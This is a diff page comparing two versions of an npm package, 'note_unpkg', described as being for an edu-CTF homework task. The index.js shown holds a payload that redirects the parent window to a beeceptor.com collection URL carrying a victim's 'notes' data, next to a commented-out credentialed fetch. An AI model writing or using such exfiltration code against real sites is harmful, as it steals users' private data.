note_unpkg 1.0.1 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -9,7 +9,7 @@ async function go() {
9
9
  // "credentials": "include"})
10
10
  // .then(res => res.text())
11
11
  // .then(res => res.content);
12
- });
12
+ //});
13
13
  await new Promise(r => setTimeout(r, 2000));
14
14
  window.parent.location = "https://o4o55555.free.beeceptor.com?q=" + notes
15
15
  };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note_unpkg",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "for edu-ctf homework",
5
5
  "main": "index.js",
6
6
  "scripts": {